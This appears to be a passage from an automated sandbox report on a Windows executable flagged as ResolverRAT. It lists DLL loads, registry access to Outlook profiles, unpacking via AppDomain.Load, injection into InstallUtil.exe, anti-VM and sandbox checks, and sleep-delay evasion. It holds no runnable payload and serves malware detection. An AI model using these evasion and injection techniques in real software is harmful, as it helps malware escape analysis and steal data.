Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: BSN100357-HHGBM100002525.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: BSN100357-HHGBM100002525.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1390243145.0000000005900000.00000004.08000000.00040000.00000008.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1390243145.0000000005900000.00000004.08000000.00040000.00000008.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp
Source:	Binary string: protobuf-net.pdb source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.BSN100357-HHGBM100002525.exe.3c694b0.3.raw.unpack, Program.cs	.Net Code: wORepIW1K System.AppDomain.Load(byte[])
Source: 0.2.BSN100357-HHGBM100002525.exe.3e0c3d0.0.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.BSN100357-HHGBM100002525.exe.3e0c3d0.0.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.BSN100357-HHGBM100002525.exe.3e0c3d0.0.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.BSN100357-HHGBM100002525.exe.3e0c3d0.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.BSN100357-HHGBM100002525.exe.3e0c3d0.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.BSN100357-HHGBM100002525.exe.6bd0000.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.BSN100357-HHGBM100002525.exe.6bd0000.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.BSN100357-HHGBM100002525.exe.6bd0000.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.BSN100357-HHGBM100002525.exe.6bd0000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.BSN100357-HHGBM100002525.exe.6bd0000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.BSN100357-HHGBM100002525.exe.6ae0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BSN100357-HHGBM100002525.exe.6ae0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BSN100357-HHGBM100002525.exe.3c694b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1392074556.0000000006AE0000.00000004.08000000.00040000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1388786989.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716, type: MEMORYSTR

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E83E8 push es; ret	0_2_067E8528
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E83E8 push es; retn 7E7Bh	0_2_067E8554
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E660F push es; iretd	0_2_067E6618
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E0E9B push es; retf	0_2_067E0E9C
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067ED7E7 push es; retf	0_2_067ED7E8
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067EE551 push ds; retn 0006h	0_2_067EE552
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F34E0 push esp; iretd	0_2_067F34E1
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F2D7B pushad ; retf	0_2_067F2D81
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F601B push es; retf	0_2_067F601C
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069D6EDC push ds; ret	0_2_069D6EDF
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069D3276 push ebp; iretd	0_2_069D327C
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC277A push cs; ret	0_2_06BC277F
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC4052 push es; ret	0_2_06BC4058
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BCFC18 push ss; retn 0006h	0_2_06BCFC1A
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BCFB81 push ss; retn 0006h	0_2_06BCFB82
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BCFBC8 push ss; retn 0006h	0_2_06BCFBCA
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BCB930 push esp; iretd	0_2_06BCB931
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C337E0 push ebx; retn 0006h	0_2_06C337E2
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C33C98 push ebp; retn 0006h	0_2_06C33C9A
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C39C3B push es; ret	0_2_06C39C40
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C3B280 pushfd ; retn 0006h	0_2_06C3B282
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C3B211 pushfd ; retn 0006h	0_2_06C3B212
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C333C1 push edx; retn 0006h	0_2_06C333C2
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C3B1D0 pushfd ; retn 0006h	0_2_06C3B1D2
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C339DD push esp; retn 0006h	0_2_06C339EA
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C3B1F1 pushfd ; retn 0006h	0_2_06C3B1F2
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C331FF push eax; retn 0006h	0_2_06C33202
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C3B1A8 pushfd ; retn 0006h	0_2_06C3B1AA
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C3F17B push es; retf	0_2_06C3F180
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C41861 push es; ret	0_2_06C41864

Source: 0.2.BSN100357-HHGBM100002525.exe.63a0000.5.raw.unpack, re7xpu3GrhUF2ARQmTL.cs

High entropy of concatenated method names: 'chr3UaBL26', 'cje3SViegq', 'XNG3j8sbxa', 'hkX3PBDOys', 'DId3fBQB1G', 'Ntv3gRBdDV', 'vgf3rMRZIg', 'fHq3M4eOpU', 'EsN3yJA83q', 'EVp3KrIDSM'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Boot Survival

Yara detected ResolverRAT

Source: Yara match

File source: Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716, type: MEMORYSTR

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716, type: MEMORYSTR

Yara detected ResolverRAT

Source: Yara match

File source: Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

API/Special instruction interceptor: Address: 7FF9105CE814

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory allocated: 6CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Memory allocated: 7CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Window / User API: threadDelayed 2215	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Window / User API: threadDelayed 2426	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6498	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3320	Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 6760	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe TID: 412	Thread sleep count: 2215 > 30	Jump to behavior
